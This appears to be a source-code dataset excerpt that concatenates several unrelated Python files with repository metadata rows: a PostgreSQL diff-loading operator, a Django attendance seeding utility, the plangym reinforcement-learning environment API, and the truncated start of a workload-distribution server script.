source = f"{work.get_path(context)}.{self.table_name.split('.')[-1]}"
for it, chunk in enumerate(source_split):
self.log.info(f'Process chunk #{it + 1} of {chunk_number}.')
with closing(hook.get_conn()) as session:
self._unload_source_to_pg(tmp_table=source, conn=session, unload_df=chunk)
self._apply_diff_change_oper(source_table=source, conn=session)
session.commit()
def _unload_source_to_pg(self, tmp_table: str, conn: psycopg2_connection, unload_df: pandas.DataFrame):
"""Upload DataFrame to TEMPORARY TABLE in postgres
:param tmp_table: Name of the temporary table
:param conn: Connection to the database
:param unload_df: DataFrame to upload to the database
"""
create_query = """
DROP TABLE IF EXISTS {tmp_table} CASCADE;
CREATE TABLE {tmp_table} AS
SELECT {target_columns}, '' as {diff_change_oper}
FROM {target_table}
LIMIT 0
""".strip()
copy_query = """
COPY {tmp_table} ({source_columns})
FROM STDIN WITH (format csv, delimiter ';')
""".strip()
query_params = {
'tmp_table': tmp_table,
'target_columns': ','.join(
self.get_table_columns(table_name=self.table_name, conn=conn)),
'source_columns': ','.join(unload_df.columns),
'target_table': self.table_name,
'diff_change_oper': self.diff_change_oper
}
with closing(conn.cursor()) as cursor:
cursor.execute(create_query.format(**query_params))
s_buf = StringIO()
unload_df.to_csv(
path_or_buf=s_buf, index=False, header=False, sep=';')
s_buf.seek(0)
cursor.copy_expert(copy_query.format(**query_params), s_buf)
def _apply_diff_change_oper(self, source_table: str, conn: psycopg2_connection):
"""Apply diff_change_oper by key, ignores unmodified columns"""
query_params = self._get_query_params(source_table, conn)
delete_query = """
DELETE FROM {target_table} trg
USING {source_table} src
WHERE {key_eq_cond} AND src.{diff_change_oper} = 'D'
""".strip()
update_query = """
UPDATE {target_table} trg
SET {set_term}
FROM {source_table} src
WHERE {key_eq_cond} AND src.{diff_change_oper} = 'U'
""".strip()
insert_query = """
INSERT INTO {target_table}({target_columns})
SELECT {target_columns}
FROM {source_table} src
WHERE src.{diff_change_oper} = 'I'
""".strip()
with closing(conn.cursor()) as cursor:
cursor.execute(delete_query.format(**query_params))
cursor.execute(update_query.format(**query_params))
cursor.execute(insert_query.format(**query_params))
def _get_query_params(self, source_table: str, conn: psycopg2_connection) -> dict[str, str]:
"""Creating parameters for queries"""
all_tgt_columns = self.get_table_columns(self.table_name, conn)
tgt_columns = [col for col in all_tgt_columns if col != 'processed_dttm']
key = self.key if isinstance(self.key, list) else [self.key]
key_eq_cond = ' and '.join(f"trg.{column}=src.{column}" for column in key)
changed_cond = [col for col in tgt_columns if col not in key]
set_term = ', '.join(f"{col} = src.{col}" for col in changed_cond)
if 'processed_dttm' in all_tgt_columns:
set_term = f'{set_term}, processed_dttm = now()'
target_columns = ','.join(tgt_columns)
return {
'target_table': self.table_name,
'source_table': source_table,
'key_eq_cond': key_eq_cond,
'target_columns': target_columns,
'set_term': set_term,
'diff_change_oper': self.diff_change_oper
}
| 39.317073 | 109 | 0.640199 | 6,070 | 0.941377 | 0 | 0 | 0 | 0 | 0 | 0 | 2,224 | 0.344913 |
5f82a8065c53d38a11111b87bd83da3803a657ae | 1,981 | py | Python | django-server/fras/attendance/utils.py | ArleneAndrews/Facial-Recognition-Attendance-System | 104d17e56af87358974331ef491949b557ab2f01 | [
"MIT"
] | 52 | 2019-01-29T14:46:17.000Z | 2022-01-14T16:11:37.000Z | django-server/fras/attendance/utils.py | etrigaen47/Facial-Recognition-Attendance-System | ad0bd18cf9582cc12002baf8c92f6638f632c46e | [
"MIT"
] | 13 | 2018-11-04T12:29:48.000Z | 2020-02-11T23:47:35.000Z | django-server/fras/attendance/utils.py | etrigaen47/Facial-Recognition-Attendance-System | ad0bd18cf9582cc12002baf8c92f6638f632c46e | [
"MIT"
] | 16 | 2019-03-07T11:07:16.000Z | 2021-08-13T07:19:28.000Z | def convert_str_to_date(string):
from datetime import datetime
datetime.strptime(string, "%Y-%m-%d %H:%M:%S.%f")
def create_database():
from attendance.models.Student import Student
from attendance.models.WorkingDay import WorkingDay
from attendance.models.LectureAttendance import LectureAttendance
from datetime import date, timedelta
create_students = True
create_working_days = True
create_lecture_attendances = True
if create_students:
student = Student(id=1, full_name='Rohan Sawant', face_id='9ee44c8c-920d-41cd-a1e0-95e9c53e649e')
student.save()
student = Student(id=2, full_name='Tanmay Sawant', face_id='85e9211d-6e2a-4a0e-9dba-917311393e2e')
student.save()
student = Student(id=3, full_name='Anirudh Iyer', face_id='2274d070-127c-4472-bc48-9df549417c19')
student.save()
if create_working_days:
for i in range(30):
working_day = WorkingDay(date=date.today() + timedelta(i))
working_day.save()
working_day = WorkingDay(date=date.today())
working_day.save()
if create_lecture_attendances:
for working_day in WorkingDay.objects.all():
LectureAttendance(working_day=working_day, lecture_name="Physics").save()
LectureAttendance(working_day=working_day, lecture_name="English").save()
LectureAttendance(working_day=working_day, lecture_name="Geography").save()
LectureAttendance(working_day=working_day, lecture_name="Civics").save()
LectureAttendance(working_day=working_day, lecture_name="Recess").save()
LectureAttendance(working_day=working_day, lecture_name="Recess").save()
LectureAttendance(working_day=working_day, lecture_name="History").save()
LectureAttendance(working_day=working_day, lecture_name="Mathematics").save()
LectureAttendance(working_day=working_day, lecture_name="Biology").save()
| 43.065217 | 106 | 0.704695 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 263 | 0.132761 |
5f83b8fcb8f9923c7beb83eb883b788a12549bf3 | 32,588 | py | Python | plangym/core.py | FragileTech/plangym | 9a1482bea099f12f82bae27f1c5d13393daa8032 | [
"MIT"
] | 3 | 2020-03-25T22:19:17.000Z | 2020-11-02T16:11:32.000Z | plangym/core.py | FragileTech/plangym | 9a1482bea099f12f82bae27f1c5d13393daa8032 | [
"MIT"
] | 44 | 2020-03-25T14:17:54.000Z | 2022-03-12T00:18:48.000Z | plangym/core.py | FragileTech/plangym | 9a1482bea099f12f82bae27f1c5d13393daa8032 | [
"MIT"
] | 2 | 2020-03-25T12:17:12.000Z | 2020-06-19T23:07:52.000Z | """Plangym API implementation."""
from abc import ABC
from typing import Any, Callable, Dict, Generator, Iterable, Optional, Tuple, Union
import gym
from gym.envs.registration import registry as gym_registry
from gym.spaces import Space
import numpy
import numpy as np
wrap_callable = Union[Callable[[], gym.Wrapper], Tuple[Callable[..., gym.Wrapper], Dict[str, Any]]]
class BaseEnvironment(ABC):
"""Inherit from this class to adapt environments to different problems."""
STATE_IS_ARRAY = True
RETURNS_GYM_TUPLE = True
SINGLETON = False
def __init__(
self,
name: str,
frameskip: int = 1,
autoreset: bool = True,
delay_init: bool = False,
):
"""
Initialize a :class:`Environment`.
Args:
name: Name of the environment.
frameskip: Number of times ``step`` will be called with the same action.
autoreset: Automatically reset the environment when the OpenAI environment
returns ``end = True``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
"""
self._name = name
self.frameskip = frameskip
self.autoreset = autoreset
self.delay_init = delay_init
if not delay_init:
self.init_env()
@property
def unwrapped(self) -> "BaseEnvironment":
"""
Completely unwrap this Environment.
Returns:
plangym.Environment: The base non-wrapped plangym.Environment instance
"""
return self
@property
def name(self) -> str:
"""Return is the name of the environment."""
return self._name
@property
def obs_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the observations returned by the Environment."""
raise NotImplementedError()
@property
def action_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the actions applied to the Environment."""
raise NotImplementedError()
def __del__(self):
"""Teardown the Environment when it is no longer needed."""
return self.close()
def step(
self,
action: Union[numpy.ndarray, int, float],
state: numpy.ndarray = None,
dt: int = 1,
) -> tuple:
"""
Step the environment applying the supplied action.
Optionally set the state to the supplied state before stepping it.
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
state: Set the environment to the given state before stepping it.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
if state is not None:
self.set_state(state)
obs, reward, terminal, info = self.step_with_dt(action=action, dt=dt)
if state is not None:
new_state = self.get_state()
data = new_state, obs, reward, terminal, info
else:
data = obs, reward, terminal, info
if terminal and self.autoreset:
self.reset(return_state=False)
return data
def step_batch(
self,
actions: Union[numpy.ndarray, Iterable[Union[numpy.ndarray, int]]],
states: Union[numpy.ndarray, Iterable] = None,
dt: Union[int, numpy.ndarray] = 1,
) -> Tuple[numpy.ndarray, ...]:
"""
Vectorized version of the `step` method. It allows to step a vector of \
states and actions.
The signature and behaviour is the same as `step`, but taking a list of \
states, actions and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)``
else returns ``(new_states, observs, rewards, ends, infos)``
"""
dt = (
dt
if isinstance(dt, (numpy.ndarray, Iterable))
else numpy.ones(len(actions), dtype=int) * dt
)
no_states = states is None or states[0] is None
states = [None] * len(actions) if no_states else states
data = [self.step(action, state, dt=dt) for action, state, dt in zip(actions, states, dt)]
return tuple(list(x) for x in zip(*data))
def init_env(self) -> None:
"""
Run environment initialization.
Including in this function all the code which makes the environment impossible
to serialize will allow to dispatch the environment to different workers and
initialize it once it's copied to the target process.
"""
pass
def close(self) -> None:
"""Tear down the current environment."""
pass
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
pass
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
tuple containing ``(observs, reward, terminal, info)``.
"""
raise NotImplementedError()
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``.
"""
raise NotImplementedError()
def get_state(self) -> Any:
"""
Recover the internal state of the simulation.
A state must completely describe the Environment at a given moment.
"""
raise NotImplementedError()
def set_state(self, state: Any) -> None:
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
Returns:
None
"""
raise NotImplementedError()
def get_image(self) -> Union[None, np.ndarray]:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return None
def clone(self) -> "BaseEnvironment":
"""Return a copy of the environment."""
raise NotImplementedError()
class PlanEnvironment(BaseEnvironment):
"""Base class for implementing OpenAI ``gym`` environments in ``plangym``."""
def __init__(
self,
name: str,
frameskip: int = 1,
episodic_live: bool = False,
autoreset: bool = True,
wrappers: Iterable[wrap_callable] = None,
delay_init: bool = False,
remove_time_limit=True,
):
"""
Initialize a :class:`PlanEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each ``dt``.
episodic_live: Return ``end = True`` when losing a live.
autoreset: Automatically reset the environment when the OpenAI environment
returns ``end = True``.
wrappers: Wrappers that will be applied to the underlying OpenAI env. \
Every element of the iterable can be either a :class:`gym.Wrapper` \
or a tuple containing ``(gym.Wrapper, kwargs)``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
"""
self._gym_env = None
self.episodic_life = episodic_live
self.remove_time_limit = remove_time_limit
self._wrappers = wrappers
super(PlanEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
@property
def gym_env(self):
"""Return the instance of the environment that is being wrapped by plangym."""
if self._gym_env is None and not self.SINGLETON:
self.init_env()
return self._gym_env
@property
def obs_shape(self) -> Tuple[int, ...]:
"""Tuple containing the shape of the observations returned by the Environment."""
return self.observation_space.shape
@property
def action_shape(self) -> Tuple[int, ...]:
"""Tuple containing the shape of the actions applied to the Environment."""
return self.action_space.shape
@property
def action_space(self) -> Space:
"""Return the action_space of the environment."""
return self.gym_env.action_space
@property
def observation_space(self) -> Space:
"""Return the observation_space of the environment."""
return self.gym_env.observation_space
@property
def reward_range(self):
"""Return the reward_range of the environment."""
if hasattr(self.gym_env, "reward_range"):
return self.gym_env.reward_range
@property
def metadata(self):
"""Return the metadata of the environment."""
if hasattr(self.gym_env, "metadata"):
return self.gym_env.metadata
def init_env(self):
"""Initialize the target :class:`gym.Env` instance."""
self._gym_env = self.init_gym_env()
if self._wrappers is not None:
self.apply_wrappers(self._wrappers)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode="rgb_array")
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``.
"""
if self.gym_env is None and self.delay_init:
self.init_env()
obs = self.gym_env.reset()
return (self.get_state(), obs) if return_state else obs
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1):
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
reward = 0
obs, lost_live, terminal, oob = None, False, False, False
info = {"lives": -1}
n_steps = 0
for _ in range(int(dt)):
for _ in range(self.frameskip):
obs, _reward, _oob, _info = self.gym_env.step(action)
_info["lives"] = self.get_lives_from_info(_info)
lost_live = info["lives"] > _info["lives"] or lost_live
oob = oob or _oob
custom_terminal = self.custom_terminal_condition(info, _info, _oob)
terminal = terminal or oob or custom_terminal
terminal = (terminal or lost_live) if self.episodic_life else terminal
info = _info.copy()
reward += _reward
n_steps += 1
if terminal:
break
if terminal:
break
# This allows to get the original values even when using an episodic life environment
info["terminal"] = terminal
info["lost_live"] = lost_live
info["oob"] = oob
info["win"] = self.get_win_condition(info)
info["n_steps"] = n_steps
return obs, reward, terminal, info
def sample_action(self) -> Union[int, np.ndarray]:
"""Return a valid action that can be used to step the Environment chosen at random."""
if hasattr(self.action_space, "sample"):
return self.action_space.sample()
def clone(self) -> "PlanEnvironment":
"""Return a copy of the environment."""
return self.__class__(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
)
def close(self):
"""Close the underlying :class:`gym.Env`."""
if hasattr(self, "_gym_env") and hasattr(self._gym_env, "close"):
return self._gym_env.close()
def init_gym_env(self) -> gym.Env:
"""Initialize the :class:`gym.Env`` instance that the current class is wrapping."""
# Remove any undocumented wrappers
spec = gym_registry.spec(self.name)
if self.remove_time_limit:
if hasattr(spec, "max_episode_steps"):
spec._max_episode_steps = spec.max_episode_steps
if hasattr(spec, "max_episode_time"):
spec._max_episode_time = spec.max_episode_time
spec.max_episode_steps = None
spec.max_episode_time = None
gym_env: gym.Env = spec.make()
gym_env.reset()
return gym_env
def seed(self, seed=None):
"""Seed the underlying :class:`gym.Env`."""
if hasattr(self.gym_env, "seed"):
return self.gym_env.seed(seed)
def apply_wrappers(self, wrappers: Iterable[wrap_callable]):
"""Wrap the underlying OpenAI gym environment."""
for item in wrappers:
if isinstance(item, tuple):
wrapper, kwargs = item
self.wrap(wrapper, **kwargs)
else:
self.wrap(item)
def wrap(self, wrapper: Callable, *args, **kwargs):
"""Apply a single OpenAI gym wrapper to the environment."""
self._gym_env = wrapper(self.gym_env, *args, **kwargs)
@staticmethod
def get_lives_from_info(info: Dict[str, Any]) -> int:
"""Return the number of lives remaining in the current game."""
return info.get("lives", -1)
@staticmethod
def get_win_condition(info: Dict[str, Any]) -> bool:
"""Return ``True`` if the current state corresponds to winning the game."""
return False
@staticmethod
def custom_terminal_condition(old_info, new_info, oob) -> bool:
"""Calculate a new terminal condition using the info data."""
return False
def render(self, mode=None):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
if hasattr(self.gym_env, "render"):
return self.gym_env.render(mode=mode)
class VideogameEnvironment(PlanEnvironment):
"""Common interface for working with video games that run using an emulator."""
def __init__(
self,
name: str,
frameskip: int = 5,
episodic_live: bool = False,
autoreset: bool = True,
delay_init: bool = False,
remove_time_limit: bool = True,
obs_type: str = "rgb", # ram | rgb | grayscale
mode: int = 0, # game mode, see Machado et al. 2018
difficulty: int = 0, # game difficulty, see Machado et al. 2018
repeat_action_probability: float = 0.0, # Sticky action probability
full_action_space: bool = False, # Use all actions
render_mode: Optional[str] = None, # None | human | rgb_array
possible_to_win: bool = False,
wrappers: Iterable[wrap_callable] = None,
):
"""
Initialize a :class:`VideogameEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each step
in dt.
episodic_live: Return ``end = True`` when losing a life.
autoreset: Restart environment when reaching a terminal state.
delay_init: If ``True`` do not initialize the ``gym.Environment``
and wait for ``init_env`` to be called later.
remove_time_limit: If True, remove the time limit from the environment.
obs_type: One of {"rgb", "ram", "gryscale"}.
mode: Integer or string indicating the game mode, when available.
difficulty: Difficulty level of the game, when available.
repeat_action_probability: Repeat the last action with this probability.
full_action_space: Whether to use the full range of possible actions
or only those available in the game.
render_mode: One of {None, "human", "rgb_aray"}.
possible_to_win: It is possible to finish the Atari game without
getting a terminal state that is not out of bounds
or doest not involve losing a life.
wrappers: Wrappers that will be applied to the underlying OpenAI env.
Every element of the iterable can be either a :class:`gym.Wrapper`
or a tuple containing ``(gym.Wrapper, kwargs)``.
"""
self._remove_time_limit = remove_time_limit
self.possible_to_win = possible_to_win
self._obs_type = obs_type
self._mode = mode
self._difficulty = difficulty
self._repeat_action_probability = repeat_action_probability
self._full_action_space = full_action_space
self._render_mode = render_mode
super(VideogameEnvironment, self).__init__(
name=name,
frameskip=frameskip,
episodic_live=episodic_live,
autoreset=autoreset,
wrappers=wrappers,
delay_init=delay_init,
)
@property
def obs_type(self) -> str:
"""Return the type of observation returned by the environment."""
return self._obs_type
@property
def mode(self) -> int:
"""Return the selected game mode for the current environment."""
return self._mode
@property
def difficulty(self) -> int:
"""Return the selected difficulty for the current environment."""
return self._difficulty
@property
def repeat_action_probability(self) -> float:
"""Probability of repeating the same action after input."""
return self._repeat_action_probability
@property
def full_action_space(self) -> bool:
"""If True the action space correspond to all possible actions in the Atari emulator."""
return self._full_action_space
@property
def render_mode(self) -> str:
"""Return how the game will be rendered. Values: None | human | rgb_array."""
return self._render_mode
@property
def has_time_limit(self) -> bool:
"""Return True if the Environment can only be stepped for a limited number of times."""
return self._remove_time_limit
@property
def n_actions(self) -> int:
"""Return the number of actions available."""
return self.gym_env.action_space.n
def clone(self, **kwargs) -> "VideogameEnvironment":
"""Return a copy of the environment."""
params = dict(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
possible_to_win=self.possible_to_win,
clone_seeds=self.clone_seeds,
mode=self.mode,
difficulty=self.difficulty,
obs_type=self.obs_type,
repeat_action_probability=self.repeat_action_probability,
full_action_space=self.full_action_space,
render_mode=self.render_mode,
remove_time_limit=self._remove_time_limit,
)
params.update(**kwargs)
return self.__class__(**params)
def get_ram(self) -> np.ndarray:
"""Return the ram of the emulator as a numpy array."""
raise NotImplementedError()
class VectorizedEnvironment(BaseEnvironment, ABC):
"""
Base class that defines the API for working with vectorized environments.
A vectorized environment allows to step several copies of the environment in parallel
when calling ``step_batch``.
It creates a local copy of the environment that is the target of all the other
methods of :class:`BaseEnvironment`. In practise, a :class:`VectorizedEnvironment`
acts as a wrapper of an environment initialized with the provided parameters when calling
__init__.
"""
def __init__(
self,
env_class,
name: str,
frameskip: int = 1,
autoreset: bool = True,
delay_init: bool = False,
n_workers: int = 8,
**kwargs,
):
"""
Initialize a :class:`VectorizedEnvironment`.
Args:
env_class: Class of the environment to be wrapped.
name: Name of the environment.
frameskip: Number of times ``step`` will me called with the same action.
autoreset: Ignored. Always set to True. Automatically reset the environment
when the OpenAI environment returns ``end = True``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
env_callable: Callable that returns an instance of the environment \
that will be parallelized.
n_workers: Number of workers that will be used to step the env.
**kwargs: Additional keyword arguments passed to env_class.__init__.
"""
self._n_workers = n_workers
self._env_class = env_class
self._env_kwargs = kwargs
self._plangym_env = None
self.SINGLETON = env_class.SINGLETON if hasattr(env_class, "SINGLETON") else False
self.RETURNS_GYM_TUPLE = (
env_class.RETURNS_GYM_TUPLE if hasattr(env_class, "RETURNS_GYM_TUPLE") else True
)
self.STATE_IS_ARRAY = (
env_class.STATE_IS_ARRAY if hasattr(env_class, "STATE_IS_ARRAY") else True
)
super(VectorizedEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
@property
def n_workers(self) -> int:
"""Return the number of parallel processes that run ``step_batch`` in parallel."""
return self._n_workers
@property
def plangym_env(self) -> BaseEnvironment:
"""Environment that is wrapped by the current instance."""
return self._plangym_env
@property
def obs_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the observations returned by the Environment."""
return self.plangym_env.obs_shape
@property
def action_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the actions applied to the Environment."""
return self.plangym_env.action_shape
@property
def gym_env(self):
"""Return the instance of the environment that is being wrapped by plangym."""
try:
return self.plangym_env.gym_env
except AttributeError:
return
def __getattr__(self, item):
"""Forward attributes to the wrapped environment."""
return getattr(self.plangym_env, item)
@staticmethod
def split_similar_chunks(
vector: Union[list, numpy.ndarray],
n_chunks: int,
) -> Generator[Union[list, numpy.ndarray], None, None]:
"""
Split an indexable object into similar chunks.
Args:
vector: Target indexable object to be split.
n_chunks: Number of similar chunks.
Returns:
Generator that returns the chunks created after splitting the target object.
"""
chunk_size = int(numpy.ceil(len(vector) / n_chunks))
for i in range(0, len(vector), chunk_size):
yield vector[i : i + chunk_size]
@classmethod
def batch_step_data(cls, actions, states, dt, batch_size):
"""Make batches of step data to distribute across workers."""
no_states = states is None or states[0] is None
states = [None] * len(actions) if no_states else states
dt = dt if isinstance(dt, numpy.ndarray) else numpy.ones(len(states), dtype=int) * dt
states_chunks = cls.split_similar_chunks(states, n_chunks=batch_size)
actions_chunks = cls.split_similar_chunks(actions, n_chunks=batch_size)
dt_chunks = cls.split_similar_chunks(dt, n_chunks=batch_size)
return states_chunks, actions_chunks, dt_chunks
def create_env_callable(self, **kwargs) -> Callable[..., BaseEnvironment]:
"""Return a callable that initializes the environment that is being vectorized."""
def create_env_callable(env_class, **env_kwargs):
def _inner(**inner_kwargs):
env_kwargs.update(inner_kwargs)
return env_class(**env_kwargs)
return _inner
callable_kwargs = dict(
env_class=self._env_class,
name=self.name,
frameskip=self.frameskip,
delay_init=self._env_class.SINGLETON,
**self._env_kwargs,
)
callable_kwargs.update(kwargs)
return create_env_callable(**callable_kwargs)
def init_env(self) -> None:
"""Initialize the target environment with the parameters provided at __init__."""
self._plangym_env: BaseEnvironment = self.create_env_callable()()
self._plangym_env.init_env()
def step(self, action: numpy.ndarray, state: numpy.ndarray = None, dt: int = 1):
"""
Step the environment applying a given action from an arbitrary state.
If is not provided the signature matches the one from OpenAI gym. It allows \
to apply arbitrary boundary conditions to define custom end states in case \
the env was initialized with a "CustomDeath' object.
Args:
action: Array containing the action to be applied.
state: State to be set before stepping the environment.
dt: Consecutive number of times to apply the given action.
Returns:
if states is None returns `(observs, rewards, ends, infos) `else \
`(new_states, observs, rewards, ends, infos)`.
"""
return self.plangym_env.step(action=action, state=state, dt=dt)
def reset(self, return_state: bool = True):
"""
Reset the environment and returns the first observation, or the first \
(state, obs) tuple.
Args:
return_state: If true return a also the initial state of the env.
Returns:
Observation of the environment if `return_state` is False. Otherwise,
return (state, obs) after reset.
"""
state, obs = self.plangym_env.reset(return_state=True)
self.sync_states(state)
return (state, obs) if return_state else obs
def get_state(self):
"""
Recover the internal state of the simulation.
An state completely describes the Environment at a given moment.
Returns:
State of the simulation.
"""
return self.plangym_env.get_state()
def set_state(self, state):
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
"""
self.plangym_env.set_state(state)
self.sync_states(state)
def render(self, mode="human"):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
return self.plangym_env.render(mode)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return self.plangym_env.get_image()
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
If state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
return self.plangym_env.step_with_dt(action=action, dt=dt)
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
return self.plangym_env.sample_action()
def sync_states(self, state: None):
"""
Synchronize the workers' states with the state of ``self.gym_env``.
Set all the states of the different workers of the internal :class:`BatchEnv`\
to the same state as the internal :class:`Environment` used to apply the\
non-vectorized steps.
"""
raise NotImplementedError()
def step_batch(
self,
actions: numpy.ndarray,
states: numpy.ndarray = None,
dt: [numpy.ndarray, int] = 1,
):
"""
Vectorized version of the ``step`` method.
It allows to step a vector of states and actions. The signature and \
behaviour is the same as ``step``, but taking a list of states, actions \
and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)`` else \
``(new_states, observs, rewards, ends, infos)``
"""
raise NotImplementedError()
def clone(self, **kwargs) -> "BaseEnvironment":
"""Return a copy of the environment."""
self_kwargs = dict(
name=self.name,
frameskip=self.frameskip,
delay_init=self.delay_init,
env_class=self._env_class,
n_workers=self.n_workers,
**self._env_kwargs,
)
self_kwargs.update(kwargs)
env = self.__class__(**self_kwargs)
return env
| 36.574635 | 99 | 0.613232 | 32,204 | 0.988217 | 617 | 0.018933 | 5,951 | 0.182613 | 0 | 0 | 16,116 | 0.494538 |
5f890b9328d6983928b109fecc583fe7148f59dc | 6,426 | py | Python | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | L2.py | coka28/AlignmentCluster | 11a4e5fc578258bd3a2181a13bdaa60346eca8da | [
"MIT"
] | null | null | null | # Layer 2 server script
# project worker
'''-.
+#_pü'-.....
ö*+...:(loop):..............................................
m}°: \
€>!: 1. register clients \
&w^: 2. distribute WLs and add them to pending \
j/6: 3. move results to results dir \
@²%: 4. remove timed-out from pending and re-open them :§
#ß$: 5. check if done /
6@y: 6. backup and call htmlUpdate /
µ<§: /
%$":......................................................../
%&"$%!§.-´´´´
€$"!.-´
'''
import sys, os, pickle, shutil, htmlTool
from time import time, sleep
os.chdir(os.path.expanduser("~"))
project = sys.argv[-1]
projDir = f'apps/aligner/projects/{project}'
clientsDir = f'{projDir}/clients'
regDir = f'{projDir}/registrations'
backupDir = f'{projDir}/backup'
resDir = f'{projDir}/results'
def registerClient(ID):
print(f'{project}: \tregistering new client with ID {ID}')
os.mkdir(f'{clientsDir}/{ID}')
os.mkdir(f'{clientsDir}/{ID}/res')
os.mkdir(f'{clientsDir}/{ID}/res/done')
with open(f'{clientsDir}/{ID}/res/done/done','wb') as doneFile:
pickle.dump(0,doneFile)
def passWLs():
global openWLs, pendingWLs
clients = os.listdir(clientsDir)
for n in clients:
if os.path.exists(f'{clientsDir}/{n}/inactive'):
clients.remove(n)
for n in clients:
if os.path.exists(f'{clientsDir}/{n}/WL'):
if time()-os.path.getmtime(f'{clientsDir}/{n}/WL') > 3600:
print(f'{project}: \tclient {n} did not retrieve their workload... reassigning and setting to inactive')
wl = pickle.load(open(f'{clientsDir}/{n}/WL','rb'))
os.remove(f'{clientsDir}/{n}/WL')
for w in wl:
if w in pendingWLs:
i = pendingWLs.index(w)
del(pendingWLs[i])
del(assignmentTimes[i])
openWLs.insert(0,w)
with open(f'{clientsDir}/{n}/inactive','w') as tmp: pass
else:
tmp = min(min(128, int(len(openWLs)/len(clients))*4+1),len(openWLs))
if tmp > 0: print(f'{project}: \tassigned {tmp} workloads to client {n}')
wl = [openWLs.pop(0) for i in range(tmp)]
with open(f'{clientsDir}/{n}/WL_tmp','wb') as tmp:
pickle.dump(wl,tmp)
for i in wl:
pendingWLs.append(i)
assignmentTimes.append(time())
os.rename(f'{clientsDir}/{n}/WL_tmp',f'{clientsDir}/{n}/WL')
def moveResults():
clientDirs = os.listdir(clientsDir)
stored = 0
for n in clientDirs:
resFiles = os.listdir(f'{clientsDir}/{n}/res')
resFiles.remove('done')
with open(f'{clientsDir}/{n}/res/done/done','rb') as doneFile:
doneWLs = pickle.load(doneFile)
for m in resFiles:
